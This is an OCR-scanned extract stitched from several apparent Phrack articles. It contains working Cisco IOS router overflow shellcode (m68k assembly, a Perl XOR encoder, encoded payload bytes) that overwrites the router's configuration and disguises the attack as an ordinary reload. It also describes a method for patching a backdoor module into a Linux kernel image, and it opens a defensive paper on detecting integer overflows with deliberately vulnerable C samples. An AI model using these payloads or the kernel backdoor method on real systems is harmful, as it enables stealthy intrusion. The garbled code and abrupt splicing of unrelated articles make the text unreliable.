we need for our "shell" code is the CPU (M68k), it’s address and data bus 
and the cooperation of the NVRAM chip. 
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There are things to keep in mind about NVRAM. First of all, it’s slow to 
write to. The Xicor chips yours truly encountered on Cisco routers require 
that after a write, the address lines are kept unchanged for the time the 
chip needs to write the data. A control register will signal when the write 
operation is done. Since the location of this control register is not known 
and might not be the same for different types of the same platform, yours 
truly prefers to use delay loops to give the chip time to write the data - 
since speed is not the attackers problem here. 


Now, that we know pretty much what we want to do, we can go on and look at 
the "how" part of things. First of all, you need to produce assembly for 
the target platform. A little known fact is, that IOS is actually build (at 
least some times) using GNU compilers. Therefore, the binutils[3] package 
can be compiled to build Cisco compatible code by setting the target 
platform for the ./configure run to target=m68k-aout. When you are done, 
you will have a m68k-aout-as binary, which can produce your code anda 
m68k—-aout-objdump to get the OP code values. 


In case the reader is fluent in Motorola 68000 assembly, I would like to 
apologize for the bad style, but yours truly grew up on Intel. 
Optimizations and style guides are welcome. Anyway, let’s start coding. 


For a string overflow scenario like this one, the recommended way for small 
code is to use self-modification. The main code will be XOR’d with a 
pattern like 0x55 or OxD5 to make sure that no 0x00 bytes show up. A 
bootstrap code will decode the main code and pass execution on to it. The 
Cisco 1600 platform with it’s 68360 does not have any caching issues to 
worry us (thanks to LSD for pointing this out), so the only issue we have 
is avoiding 0x00 bytes in the bootstrap code. Here is how it works: 


--- bootstrap.s --- 
-globl _start 
_start: 


Remove write protection for NVRAM. 
Protection is Bit 1 in BR7 for 0x0E000000 
move.l #0x0FFO10C2,%al 

lsr (Sal) 


fix the brance opcode 
'bne decode_loop’ is OP code 0x6600 and this is bad 


lea broken_branch+0x101(%pc) ,%a3 
sub.a #0x0101,%a3 
lsr (a3) 


perform dummy load, where 0x01010101 is then replaced 

by our stack ptr value due to the other side of the pointer 
exchange 

move.l #0x01010101, %dl1 


get address of the real code appended plus 0x0101 to 
prevent 0x00 bytes 


lea xor_code+0x0101(%pc) ,%a2 
sub.a 0x0101, a2 


prepare the decode register (XOR pattern) 
move.w OxD5D5, $d1 


decode_loop: 
| Decode our main payload code and the config 
eor.w Sd1, (%a2)+ 
| check for the termination flag (greetings to Bine) 
cmpi.l #0xCAFEFOOD, (%a2) 

broken_branch: 
| this used to be ’bne decode_loop’ or Ox6600FFF6 
.byte OxCC, 0x01, OxFF, OxF6 


xor_code: 


-—-- end bootstrap.s --- 
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You may assemble the code into an object file using: 
linux# m68k-aout-as -m68360 -pic pcrel -o bootstrap.o bootstrap.s 


There are a few things to say about the code. Number one are the first two 
instructions. The CPU we are dealing with supports write protection for 
memory segments [4]. Information about the memory segments is stored in 
so-called "Base Registers", BRO to BR7. These are mapped into memory at 
OxOFFO0000 and later. The one we are interested in (BR7) is at OxOFFO10C2. 
BitO tells the CPU if this memory is valid and Bitl if it’s write 
protected, so the only thing we need to do is to shift the lower byte on 
Bit to the right. The write protection Bit is cleared and the valid Bit is 
still in place. 


The second thing of mild interest is the broken branch code, but the 

explaination in the source should make this clear: the OP code of "BNE" 
u 
a 


nfortunately is 0x6600. So we shift the whole first word one to the right 
nd when the code runs, this is corrected. 


= 


he third thing is the dummy move to dl. If the reader would refer back to 
the place we discussed the pointer exchange, he will notice that there is a 
"back" part in this operation: namely the stack address is written to our 
ode plus 20 bytes (or 0x14). So we use a move operation that translates to 
he OP code of 0x223c01010101, located at offset 0x12 in our code. After 

he pointer exchange takes place, the 0x01010101 part is replaced by the 
ointer - which is then innocently moved to the dl register and ignored. 


Odtcta 


When this code completed execution, the appended XOR’d code and config 
should be in memory in all clear text/code. The only thing we have to do 
now is copy the config in the NVRAM. Here is the appropriate code to do 
this: 


--- config_copy.s --- 
-globl _start 


start: 
| turn off interrupts 
move.w 0x2700,%sr; 
move.1 OxOFFO10C2, %al 
move.w 0x0001, (%al) 
| Get position of appended config and write it with delay 
lea config (%pc),%a2 
move.1 OxOEOQOOO2AE, Sal 
move.1 0x00000001, $d2 
copy_confg: 
move.b (%a2)+, (Sal) + 
| delay loop 


move.1 OxOOOOFFFF, $dl1 
write_delay: 
subx %d2,%d1 


bmi write_delay 
cmp. 1 #OxXCAFEFOOD, (%a2) 
bne copy_confg 


| delete old config to prevent checksum errors 
delete_confg: 


move.w 0x0000, (Sal) + 
move.1 OxOOOOFFFF, $dl1 
| delay loop 


write_delay2: 
subx %d2,%dl1 
bmi write_delay2 
cmp. 1 #0x0E002000, %al 
bit delete_confg 


| perform HARD RESET 
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CPUReset: 
move.w 0x2700,%sr 
moveal OxOFFO0000, a0 
moveal (%a0),%sp 
moveal OxOFFO0004, a0 
moveal (a0), %a0 
jmp (a0) 

config: 


--- end config_copy.s --- 


There is no particular magic about this part of the code. The only thing 
worth noticing is the final CPU reset. There is reason why we do this. If 
we just crash the router, there might be exception handlers in place to 
save the call stack and other stuff to the NVRAM. This might change 
checksums in an unpredictable way and we don’t want to do this. The other 
reason is, that a clean reset makes the router look like it was rebooted by 
an administrator using the "reload" command. So we don’t raise any 
questions despite the completely changed configuration ;-) 


The config_copy code and the config itself must now be XOR encoded with the 
pattern we used in the bootstrap code. Also, you may want to put the code 
into a nice char array for easy use in aC program. For this, yours truly 
uses a dead simple but efficient Perl script: 


--- objdump2c.pl --- 
#!/usr/bin/perl 


Spattern=hex (shift); 
Saddressline=hex (shift); 


while (<STDIN>) { 
chomp; 
if (/[0-9a-f£]+:\t/) f{ 
(undef, $hexcode, Smnemonic)=split (/\t/,$_); 
Shexcode="s/ //g; 
Shexcode="s/([0-9a-f£]{2})/$1 /g; 


Salc=sprintf ("%08X",Saddressline) ; 
Saddressline=Saddresslinet (length (S$hexcode) /3) ; 


@bytes=split(/ /,Shexcode) ; 
Stabnum=4- (length ($hexcode) /8) ; 
Stabs="\t"xStabnum; 
Shexcode=""; 
foreach (@bytes) { 
$_=hex ($_); 
S_=S_*Spattern if (Spattern) ; 
Shexcode.=sprintf£("\\x%02X",$_); 
} 
print "\t\"".Shexcode."\"".Stabs."//".Smnemonic." (O0x".Salc.")\n"; 
} 


} 
—-- end objdump2c.pl --- 


You can use the output of objdump and pipe it into the script. If the 
script got no parameter, it will produce the C char string without 
modifications. The first optional paramter will be your XOR pattern and the 
second one can be the address your buffer is going to reside at. This makes 
debugging the code a hell of a lot easier, because you can refer to the 
comment at the end of your C char string to find out which command made the 
Cisco unhappy. 


The output for our little config_copy.s code XOR’d with 0xD5 looks like 
this (trimmed for phrack): 


linux# m68k—-aout-objdump -d config_copy.o | 
> ./objdump2XORhex.pl OxD5 0x020F2A24 
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"\x93\x29\xF2\xD5" //movew #9984,%sr (0x020F2A24) 
"\xF7\xA9\xDA\x25\xC5\x17" //moveal #267391170,%al (0x020F2A28) 
"\ xE7\x69\xD5\xD4" //movew #1,%al@ (Ox020F2A2E) 
"\x90\x2F\xD5\x87" //lea %pc@(62 <config>),%a2 (0x020F2A32) 
"\ xF7\xA9\xDB\xD5\xD7\x7B" //moveal #234881710,%al (0x020F2A36) 
"\xA1\xD4" //moveq #1,%d2 (0x020F2A3C) 
"\xC7\x0F" //moveb %a2@+,%al@+ (0x020F2A3E) 

"\ xF7\xE9\xD5\xD5\x2A\x2A" //movel #65535,%d1 (0x020F2A40) 
"\x46\x97" //subxw %d2,%d1 (0x020F2A46) 

"\ xBE\xD5\x2A\x29" //omiw 22 <write_delay> (0x020F2A48) 
"\xD9\x47\x1F\x2B\x25\xD8" //cmpil #-889262067,%a2@ (0x020F2A4C) 
"\xB3\xD5\x2A\x3F" //onew la <copy_confg> (0x020F2A52) 
"\ xE7\x29\xD5\xD5" //movew #0,%al@+ (0x020F2A56) 

"\ xF7\xE9\xD5\xD5\x2A\x2A" //movel #65535,%d1 (0x020F2A5A) 
"\x46\x97" //subxw %d2,%d1 (0x020F2A60) 

"\ xBE\xD5\x2A\x29" //omiw 3c <write_delay2> (0x020F2A62) 
"\x66\x29\xDB\xD5\xF5\xD5" //cmpal #234889216,%al (0x020F2A66) 
"\xB8\xD5\x2A\x3D" //bltw 32 <delete_confg> (0x020F2A6C) 
"\x93\x29\xF2\xD5" //movew #9984,%sr (0x020F2A70) 

"\ xF5\xA9\xDA\x25\xD5\xD5" //moveal #267386880,%a0 (0x020F2A74) 
"\xFB\x85" //moveal %a0@,%sp (O0x020F2A7A) 

"\ xF5\xA9\xDA\x25\xD5\xD1" //moveal #267386884,%a0 (0x020F2A7C) 
"\xF5\x85" //moveal %a0@,%a0 (0x020F2A82) 
"\x9B\x05" //jmp %a0@ (0x020F2A84) 

Finally, there is only one more thing to do before we can compile this all 
together: new have to create the new NVRAM header and calculate the 


checksum for our new config. The NVRAM header has the form of: 


typedef struct { 


u_intl16_t magic; // OxABCD 
u_int1l6_t one; // Probably type (1=ACII, 2=gz) 
u_intl6_t checksum; 
u_intl6_t lOSver; 
u_int32_t unknown; // 0x00000014 
u_int32_t cfg_end; // pointer to first free byte in 
// memory after config 
u_int32_t size; 
} nvhdr_t; 


Obviously, most values in here are self-explainory. This header is not 
nearly as much tested as the memory structures, so IOS will forgive you 
strange values in the cfg_end entry and such. You can choose the IOS 
version, but yours truly recommends to use something along the lines of 
OxO0BO3 (11.3), just to make sure it works. The size field covers only the 
real config text - not the header. 

The checksum is calculated over the whole thing (header plus config) with 
the checksum field itself being set to zero. This is a standard one’s 
complement checksum as you find in any IP implementation. 


When putting it all together, you should have something along the lines of: 


AAAAAAAAAAAA 


AAAAAAAAAAAA 


FAKE BLOCK 


Bootstrap 


config_copy 
XOR pat 
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NVRAM header 
+ config 
XOR pat 


..which you can now send to the Cisco router for execution. If everything 
works the way it is planned, the router will seemingly freeze for some 
time, because it’s working the slow loops for NVRAM copy and does not allow 
interrupts, and should then reboot clean and nice. 


To save space for better papers, the full code is not included here but is 
available at http://www.phenoelit.de/ultimaratio/UltimaRatioVegas.c . It 
supports some adjustments for code offset, NOPs where needed and a slightly 
different fake block for 11.1 series IOS. 


--[ 6 - Everything not covered in 1-5 


A few assorted remarks that somehow did not fit into the rest of this text 
should be made, so they are made her 


First of all, if you find or know an overflow vulnerability for IOS 11.x 
and you think that it is not worth all the trouble to exploit since 
everyone should run 12.x by now, let me challange this. Nobody with some 
experience on Cisco IOS will run the latest version. It just doesn’t work 
correctly. Additionally, many people don’t update their routers anyway. But 
the most interesting part is a thing called "Helper Image" or simply "boot 
Ios". This is a mini-IOS loaded right after the ROM monitor, which is 
normally a 11.x. On the smaller routers, it’s a ROM image and can not be 
updated easily. For the bigger ones, people assured me that there are no 
12.x mini-IOSes out there they would put on a major production router. Now, 
when the Cisco boot up and starts the mini-I0OS, it will read the config and 
work accordingly as long as the feature is supported. Many are - including 
the TFTP server. This gives an attacker a 3-8 seconds time window in which 
he can perform an overflow on the IOS, in case somone reloads the router. 
a 
b 


n case this goes wrong, the full-blown IOS still starts up, so there will 
e no traces of any hostile activity. 


The second item yours truly would like to point out are the different 

things one might want to explore for overflow attacks. The obvious one 
( 
A 


used in this paper as example) is a service running on a Cisco router. 
nother point for overflowing stuff are protocols. No protocol inspection 
ngine is perfect AFAYTK. So even if the IOS is just supposed to route 

the packet, but has to inspect the contents for some reason, you might find 
something there. And if all fails, there are still the debug based 
overflows. IOS offers a waste amount of debug commands for next to 
everything. These do normally display a lot of information comming right 
from the packet they received and don’t always check the buffer they us 

for compiling the displayed string. Unfortunately, it requires someone to 
turn on debugging in the first place - but well, this might happen. 


And finally, some greets have to be in her Those go to the following 
people in no particular order: Gaus of Cisco PSIRT, Nico of Securite.org, 
Dan of DoxPara.com, Halvar Flake, the three anonymous CCIEs/Cisco wizards 
yours truly keeps asking strange questions and of course FtR and Mr. V.H., 
because without their equipment, there wouldn’t be any research to speak 
of. Additional greets go to all people who research Cisco stuff and to whom 
yours truly had no chance to talk to so far - please get in touch with us. 
The last one goes to the vulnerability research labs out there: let me 

know if you need any help reproducing this ‘;-7 
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--[{ 1 - Introduction 


This paper will show a simple way to patch a common LKM into the 

static linux kernel image.Most kernel backdoors are implemented by loadable 
kernel module which is loaded into kernel by insmod or /dev/kmem, and the 
backdoor module can found easily if the disk can be mounted on other 
machines.It is not th xpected result.What is wanted is just to find a 
method to put the LKM into kernel image,and make it run when reboot. 


The program attached in the appendix contains codes and debugs in redhat7.2 
(Intel)default installation,and can be easily tested on other kernel 
versions by some modification.Also the program is based on the 
/boot/System.map file which contains the kernel symbol address.If the file 
doesn’t exist on your system,more works have to be done to make it run. 


[2 Get kernel from the image 


The first step is getting kernel from image file that is usually compressed 
(uncompress image is not concerned because it is much easier) .The imag 

file can be analyzed from the kernel source files,and Makefile will 

clarify the structure of the image. 


[/usr/src/linux/arch/i386/boot/Makefile] 


zImage: $(CONFIGURE) bootsect setup compressed/vmlinux tools/build 
S(OBJCOPY) compressed/vmlinux compressed/vmlinux.out 
tools/build bootsect setup compressed/vmlinux.out $(ROOT_D 


ea 
< 
Vv 


zImage 
(bzImage is similar) 


bootsect: bootsect.o 
$(LD) -Ttext 0x0 -s --oformat binary -o $@ $< 


bootsect.o: bootsect.s 
S(AS) -o $@ S< 
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bootsect.s: bootsect.S Makefile $(BOOT_INCL) 
S(CPP) $(CPPFLAGS) -traditional $(SVGA_MODE) $(RAMDISK) \ 
$< -o $@ 


setup: setup.o 
$(LD) -Ttext 0x0 -s --oformat binary -e begtext -o $@ S< 


setup.o: setup.s 
S(AS) -o $@ $< 


setup.s: setup.S video.S Makefile $(BOOT_INCL) $(TOPDIR) \ 
/include/linux/version.h $(TOPDIR) /include/linux/compile.h 

S(CPP) $(CPPFLAGS) -D__ASSEMBLY_ -traditional \ 
S(SVGA_MODE) S$(RAMDISK) $< -o S$@ 


The bootsect and setup file are easy to understand.They are created by 
bootsect.s and setup.s respectively.The vmlinux.out file is raw binary 
file generated by objcopy command.The value of $(OBJCOPY) is 

"objcopy -O binary -R .note -R .comment -S". More details are available 
by ‘man objcopy*.When the thr files are ready the build program will 
bind the three files to on file which is the kernel image file. 


However the vmlinx file is generated more complicatedly.It is also possible 


to go into the compressed directory and look through the Makefile. 


[/usr/src/linux/arch/i386/boot/compressed/Makefile] 


vmlinux: piggy.o $ (OBJECTS) 
S(LD) $(ZLINKFLAGS) -o vmlinux $(OBJECTS) piggy.o 


The $(OBJECTS) includes head.o and misc.o,compiled by head.S and 
misc.c respectively.The most important step in head.S is calling 
the decompress_kernel function in misc.c.The function will inflate 


the compressed kernel.When the decompress_kernel takes effect,it requires 


input_len and input_data symbol which are defined in piggy.o 


piggy.o: S$ (SYSTEM) 
tmppiggy=_tmp_S$S$S$Spiggy; \ 
rm -f SStmppiggy S$Stmppiggy.gz SStmppiggy.1ink; \ 
S(OBJCOPY) $(SYSTEM) $Stmppiggy; \ 
gzip -f -9 < SStmppiggy > SS$tmppiggy.gz; \ 


echo "SECTIONS { .data : { input_len = .; 
LONG (input_data_end - input_data) input_data = .; \ 
*(.data) input_data_end = .; }}" > SStmppiggy.1ink; 


$(LD) -r -o piggy.o -b binary $Stmppiggy.gz -b elf32-1i386 -T \ 
SStmppiggy. lnk; 
rm -f SStmppiggy SStmppiggy.gz SStmppiggy.lnk 


section.The ld requires a command file like this\ 


SECTIONS { .data : { input_len = .; LONG(input_data_end - input_data) \ 
input_data = .; *(.data) input_data_end = .; }} 


by misc.o.Hopefully the command "gzip -f -9" also can be seen. It just 
compressed the kernel file compiled by thousands of kernel source files. 


So the kernel image could be described like this 
[bootsect] [setup] [ [head] [misc] [compressed_kernel1] ] 


Now let us understand more about the boot process. 

The process can be separated into the following some logical stages: 
1.BIOS selects the boot device. 

2.BIOS loads the [bootsecto] from the boot device. 

3.[bootsect] loads [setup] and [[head] [misc] [compressed_kernel]]. 


The piggy.o file is a common ELF object file.However,it only contains data 


The command fil nables the piggy.o to have the symbol which is required 


.txt 


YAO OO 
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.[setup] do sth. and jmp to [head] (it is at 0x1000 or 0x100000). 
. [head] call uncompressed_kernel in [misc]. 
. [misc] uncompressed [compressed_kernel] and put it at 0x100000. 


After 


-high level init(begin at startup_32 in linux/arch/i386/kernel/head.S). 


the machine run into step 7,the high level initialization begins. 


When the structure of the kernel image is clear,kernel text from the 

compressed image with a dirty method are easily available.It is matching 
the compress-magic contained in image.It is also known the 4-byte number 
before the magic is the input_data from which the offset can be verified. 


After 


cao 


this gunzip the kernel is pretty easy. 


—- Allocate some space in image to use 


The allocation here doesn’t mean vmalloc or kmalloc method.It just means 


space 


is required to contain the LKM file.The lkm file >> the kernel can 


be easily catted,but it will not work.To find the reason,the best method is 


to go 


back into the kernel initial code,which is all in step 7 mentioned 


above. 


[/usr/src/linux/arch/i386/kernel/head.S$] 


yx 


* Clear BSS first so that there are no surprises... 

* / 

xorl %eax, teax 

movl S SYMBOL NAME (__bss_start),%edi 

movl S SYMBOL NAME (_end),%ecx 

subl %edi, %ecx 

cld 

rep 

stosb 
After reading the head.S file,the above code can be found,which clearly 


expressed that it will clarify BSS range.The BSS area contains the 
uninitialized variable which is not included in the kernel file,but the 


kernel 


l memory will leave the area to bss.So the 1lkm will be clear if just 


appending the code to the kernel.To solve the problem some dummy data 


can b 


added before the code the length of which is just equal to the bss 


size.! 


Though it will make the new kernel much larger,the compressed will 


help to deflate all the zero data effectively. 


However there is also another problem.Read through followed code 


[/usr/src/linux/arch/i386/kernel/setup.c] 


void __init setup_arch(char **cmdline_p)---called by start_kernel 


init_mm. 
/* 
* partially used pages are not usable - thus 
* we are rounding upwards: 
*/ 
start_pfn = PFN_UP(__pa(&_end));start_code = (unsigned long) &_text; 


init_mm.end_code 
init_mm.end_data 


(unsigned long) &_etext; 
(unsigned long) &_edata; 


init_mm.brk = (unsigned long) &_end;//it is bss end 


The kernel wouldn’t leave any space to the lkm unreasonable,so it will 

manage the space available from the bss end which is just the beginning 
of the LKM code.Therefore,the _end symbol in text should be modified to 
give the start_pfn a larger value.Then the new kernel will be like this: 


[modified kernel] [all zero dummy] [module] 
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[ 4 Relocate the symbol in module file 


The module is common LKM file and its type is usually ELF object file,and 
the object file need to be relocated before it could be used.The following 
xample make it easier to understand. 


int init_module () 

{ 

char s[] = "hello world\n"; 
printk("%s\n",s); 

return 0; 


} 


After compiling the program by command gcc,the module.o is available: 


[root@linux-jbtzhm test]#gcc -O2 -c module.c 


[root@linux-jbtzhm test]# objdump -x module.o|more 


RELOCATION RECORDS FOR [.text]: 


OFFSET TYPE VALUE 

00000004 R_386_32 .rodata 
00000009 R_386_32 .rodata 
0000000e R_386_PC32 printk 


[root@linux-jbtzhm test]# objdump -d module.o 
test.o: file format elf32-1i386 
Disassembly of section .text: 


00000000 <init_module>: 


Ox 55 push Sebp 

1: 89 e5 mov sesp, sebp 

3: 68 00 00 00 O00 push S0x0 

8: 68 Od 00 00 OO push SOxd 

als e8 fc ff ff ff call e <init_modulet+0xe> 
12: 31 cO xor Seax, eax 

14: E93 leave 

LS? e3 ret 


The object file structure is clear from the output of objdump.There are 
three entries in the text relocation section,and the offset shows the place 
should be corrected.For the printk symbol,the type is R_386_PC32 which 
means relative call instruction(R_386_32 means absolute address).So after 
relocation the value of "fc ff ff ff" in the text that calls printk will 
be put out in the right value. 


However,it is more complex than what can be described about the relocation, 
and more information about it is available from ELF specifications.About 

the implementation of relocation Silvio had written many codes in his 
paper-RUNTIME KERNEL KMEM PATCHING-.Many lines are refereed from it and some 
operations are added about uninitialized static and SHN_COMMON variables. 


[ 5 Make it autorun when reboot 


After the above steps the new kernel appears like this 
[modified kernel] [all zero dummy] [relocated module] 


But the module don’t have chance to be called,so the kernel running path 
has to be changed to call the function init_module in lkm.My method is 
adding some code between the dummy data and the module and changing the 
value of sys_call_table[SYS_getpid] to the code.Many programs (like init) 
will call getpid when machine reboots,then the code will be called. 


char init_code[]={ 
"\ xE8\x00\x00\x00\x00" //call init module 
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"\xC7\x05\x00\x00\x00\x00\x11\x11\x11\x11" //restore orig_getpid 
"\xE8\x11\x11\x11\x11" //call orig_getpid 

W\xC3" //ret 

}; 


All the relative and absolute addr is written by wrong value,but it is not 
necessary to worry about that.When relocating the module the accurate 
values about those address can be also make certain. 


So the final new kernel had come int being. 
[modified kernel] [all zero dummy] [init_code] [relocated module] 


Then the new kernel image followed the steps in Makefile is generated.Now 
a new kernel patched by the module is available. 


-—-[ 6 -— Possible solutions 


Deleting the /boot/System.map is the easiest way to prevent someone from 

using this program without any modification.However Silvio had shown some 
ways to generate the kernel symbol list from kernel.So it is not the final 
solutions.Adding some module to prevent kernel image from being modified is 
not a bad idea,but the precondition is the system should support the module. 


When a kernel image was patched,its size and checksum could be detected, 
so some function can be added to cheat the manager,but I don’t have time 
to do that.If you have more ideas please don’t hesitate to contact me. 


--[{ 7 - Conclusion 


Now it is clear that it is so easy to patch the kernel image.If the host 
is compromised,nothing should be trusted,even if your own eyes.Halting the 
machine and mounting the disk to another host is a good idea. 


This paper is just for education.Please don’t use it for other purposesA. 
Sorry about my poor English and the dirty code of my program.Everything 
should be better if I have more time.Though it could work well at 

redhat 7.2,there maybe some problems if moved to all versions of linux 
kernel.However,time is not enough for the tests on all kinds of 
environment. 
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[ 1 - Introduction 


a 

knowledge. 
vulnerabilities. 

these vulnerabilities by adding compiler support that detects and flags 
i 

p 


nteger overflow and integer sign vulnerabilities are now common 


This has led to increased exploitation of integer-related 


nteger vulnerabil 
resented to demonstrate the feasibility of this technique. 


The article will attempt to suggest a way to detect 


lities exploitations. Specifically a gcc patch is 


The article is divided into three parts. Part one contains a brief 


lnerabil 


ities. 


detect 


nerabil 


introduction to some of the common integer related vulnerabilities. We 
list some of the recent public vulnerabilities. Part two of the article 
tries to explain the root cause of the problem with integer 

Using real examples, the article explains why 
ploitation is possible in the first place, and how it may be possible 


exploitation of integer vulnerabilities, even when th 
ity is not known in advance. Part three goes through the 


plementation of the suggested detection scheme. Since the 
plementation of this detection scheme is in the form of a gcc patch, 
introduction information about gcc internals is provided as well. We 
mmarize the paper by demonstrating the protection at work against 
OpenSSH and the Apache httpd packages. 
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--[ 2 - Part I - Integer problems 


----[ 2.1 - Introduction 


In the last year the attention seems to have shifted to a new bad 
programming practice. This practice is related to the possibility to 
integer overflows that cause buffer overflows. It turns out the many 
popular and (assumed to be) secure software packages (OpenSSH, Apache, 
*BSD kernel) share this vulnerability. The root cause for this bad 
practice is insufficient input validation for integer type input. Integer 
input looks so naive, only a few bits long. What can go wrong here? Well, 


it 


seems that quite a lot can go wrong. The following is a table of 


integer related vulnerabilities taken from the OpenBSD and FreeBSD 
security lists. All vulnerabilities have been reported during year 2002. 


Vulnerable package Short description of vulnerability 

OpenBSD select syscall Positive limit checks against int value 
(See reference [4]) allowing stack overflow 

RPC xdr_array Int overflow cause small buffer allocation 


which later overflowed with input 


OpenSSH Authentication Int overflow cause small buffer allocation 
which later overflowed with input 


Apache chunked-encoding| Positive condition is done on signed int 
allowing heap overflow 


FreeBSD get_pallette Positive condition is done on signed int 
allowing information leak from kernel to user 


FreeBSD acceptl,getsoc-| Positive condition is done on signed int 
knamel, getpeernamel allowing information leak from kernel to user 


Table 1 - Sample integer vulnerabilities in year 2002. 


The common problem that exists in all of the above vulnerabilities is 
that an input of integer type (Signed and unsigned) was used to trigger 
overflow (when writing) or info leak (when reading) to/from program 
buffers. All of the above vulnerabilities would have been prevented if 
proper limits had been enforced. 


----[ 2.2 - Basic code samples 


In 
fo 


teger vulnerabilities can be further illustrated by looking at the 
llowing two simple code samples. 


Example 1 (int overflow): 


O1 


02 
03 


04 
05 
06 
07 
08 
09 
10 


ape 


int main(int argc,char* argv[]) { 
unsigned int len,i; 
char *buf; 
if(arge != 3) return -1; 
len=atoi (argv[1]); 
buf = (char*)malloc(lentl); 
if (!buf) { 


printf ("Allocation faild\n"); 
return -1; 


} 


for(i=0; i < len; it+t){ 
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12 buf[i] = _toupper(argv[2][i]); 

1.3 } 

14 buf [i]=0; 

[5 printf ("%s\n",buf); 

16 } 

The code above seems quite legit. The program converts a string to its 


upper case representation. First it allocates enough space for the string 
and the NULL termination character. Then it converts each character into 
its upcase value. But when looking a bit closer, we can identify two 
major problems in the code. First, the program trusts the user to have as 
much characters as he specifies (which is obviously not the case) (line 
5). Second, the program doesn’t take into account that by calculating the 
space to allocate, an integer overflow may occur (line 6). Trying to 
generalize the problem, the first bug may allow the attacker to read 
information, which he didn’t provide (by trusting the user input and 
reading *len* chars from argv[2]). The second bug allows the attack to 
overflow the heap with its own data, and therefore to fully compromise 
the program. 


Example 2 (sign check-bypass): 


01 #define BUF_SIZE 10 
02 int max = BUF_SIZE; 
03 int main(int argc,char* argv[]) { 
04 int len; 
05 char buf [BUF_SIZE]; 
06 if(argce != 3) return -1; 
07 len=atoi(argv[1]); 
08 if(len < max) 
09 memcpy (buf, argv[2],len); 
10 printf("Data copied\n"); 
11 } 
12 else 
3 printf("Too much data\n"); 
14 } 
The second example shows a program that had the intention to solve the 


problem introduced in the first example, by attempting to enforce user 
input length to a known and predefined maximum value. The problem in this 
code is that len is defined as a signed int. In this case a very big 
value (unsigned wise) is interpreted as a negative value (line 8), which 
will bypass the limit check. Still, in line 9 the same value is 
interpreted as an unsigned positive number causing a buffer overflow and 
possibly allowing a full compromise. 


--[ 3 - Part II - Exploitation pattern 


----[ 3.1 - One input, two interpretations 


So what is the real problem? How come such security-oriented packages 
have these vulnerabilities? The answer is that integer inputs sometimes 
have an ambiguous interpretation at different parts of the code (integer 
may change their sign at different values, implicit type cast, integer 
overflows). That ambiguous interpretation is hard to notice when 
implementing input validation code. 


To explain this ambiguity let us look at the first example. At the time 
of allocation (line 6), the code believes that since the input is a 


9.txt Wed Apr 26 09:43:44 2017 4 


number, then adding another number will yield a 


bigger number (lent+l). 


But since typical C language programs ignor 


integer overflows the 


particular number Oxffffffff do not apply to this assumption and yields 


unexpected result (zero). Unfortunat 
later in the cod Therefore the sam 
interpreted as an unsigned value 


ly th 


n the second th 


xampl 


therefor 
(line 8) 


hen calling memcpy. The cod 
nput as if it was a signed number 
s if it was an unsigned (line 9). 


I 
H 
Ww 
a: 
a 


7 


invisibl 
vulnerabl 


This ambiguity is 
leaving the cod 


e for the coder eye, 
to this "stealthy" 


----[ 3.2 - What is the nature of the input? 


Looking back at the abov 
attacker input. (Sorry if th 


sam 
input Oxffffffff this time 
(a huge positive number). 


ambiguity of the input is even more 
ere the code includes a silent type casting generated by the 
is checking the value 
while using it to 


rror is *NOT* repeated 


obvious. 
compiler 
of the 
copy data 


and may go undetected, 
attack. 


xamples reveal a common meaning for the 
next few lines wil 


1 explain the obvious :>) 


The above input is a number for a reason. It is 
items! It doesn’t matter what those "items" are 
files, etc.). They are still countable amount o 
do with such a counter? Well, you are most like 
"count" amount of times. 
also a counter. There ar 
the 


many other reasons to 


a counter! It counts 
(bytes, chars, objects, 
f items. And what can you 


ly to do some processing 
As a note I will say that not *every* number is 


have numbers around. But 


one that are related to integer vulnerabilities happend to be 


"counters" most of the time. 
For example, if the count is for challenge respons 
"count" amount of responses (OpenSSH). 


you may want to read 


Or if the count is buffer length 


you may want to copy "count" amount of bytes from one memory location to 


he other (Apache httpd). 


4 


"Loop" 
This "loop" may have multiple forms such as the 
or aS an implicit loop in memcpy. 


Still 


he bottom line is that somewhere behind this number there is the proper 
in the code that will do some processing, 


"count" number of times. 
for-loop in the first 
all loop flavors will 


example, 
end up looping around the "count". 


323 


sooo [ Suggested detection 


Ok, what do 
— The input 
— Somewhere 
iteration counter. 


was ambiguously used in the code. 


To make th 


interpretation of the number ambiguous, 


we have so far about those vulnerabilities? 


in the code there is a loop that uses the input integer as an 


the attacker has to 


For that to happen 
Looking at the 


interpretation of the number 


send a huge number. Looking at the first example we can see that in order 
to make the number ambiguous the attacker needed to send such a big 
number that if doing (len+1l) the number will overflow. 

the attacker will have to send the value Oxffffffff. 

second example, in order to make th 

ambiguous, the attacker needs to send such a number that will fall into 
the negative range of an integer 0x80000000-Oxffffffff. 

The same huge number sent by the attacker to trigger the vul 


as the iterations counter 
nature of the input?") 


later used in a loop 
section "What is the 
Now lets analyze the exploit process: 

Attacker wants to overflow buffer. 

Attacker may use integer vulnerability 
Attacker sends a huge integer to trigger the 


Count loop executes (probably) 
A Buffer is overflowed 


1 
OS 
3. 
4 
5 


nerability is 
(As discussed in the 


vulnerability. 


using attacker input as the loop bound. 
(On early iterations of the loop!) 
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Therefore detecting (and preventing) integer vulnerability exploitation 
is possible by validating the loop bounds before its execution. The 
validation of the loop will check that the loop limit is not above a 
predefined threshold, and if the limit is higher that the threshold a 
special handler will be triggered to handle the possible exploitation. 


Since the value required to trigger most integer vulnerabilities is huge, 
we can assume (hope) that most legitimate loops will not trigger this 
protection. 


To get a feeling for what values we expect to see in integer 
Vulnerabilities, lets examine the following samples: 


—- Allocating buffer for user data + program data 


Looks like: buf = malloc(len + sizeof (header) ); 


In this case the value required for triggering int overflow is very close 
to Oxffffffff since most program struct sizes are in the range of several 
bytes to hundreds bytes at most. 


- Allocating arrays 
looks like: buf = malloc(len * sizeof (object) ); 


In this case the value required for triggering the overflow may be much 
smaller then in the first example but it is still a relatively huge 
value. For example if sizeof (object) == 4 then the value should be bigger 
then 0x40000000 (one Giga). Even if the sizeof (object)== 64 the value 
should be bigger then 0x4000000 (64 Mega) in order to cause an overflow. 


- Falling to negative rang 


In this case the value required to make a number negative is any number 
bigger then Ox7fffffff. 


Looking at the values required to trigger the integer vulnerability, we 
can choose a threshold such as 0x40000000 (One Giga) that will handle 
most cases. Or we can select smaller threshold for better protection, 
which may trigger some false positives. 


--[ 4 - Part III - Implementation 
----[{ 4.1 - Introduction 


Once we have a suggested a way to detect integer attacks, it will be nice 
to implement a system based on that idea. A possible candidate for 
implementing this system is to extend an existing compiler. Since the 
compiler knows about all loops in the application, it will be possible 
for the compiler to add the appropriate security checks before any "count 
loop". Doing so will secure the application without any knowledge of the 
specific vulnerability. 


Therefore I choose to implement this system as a gcc patch and name it 
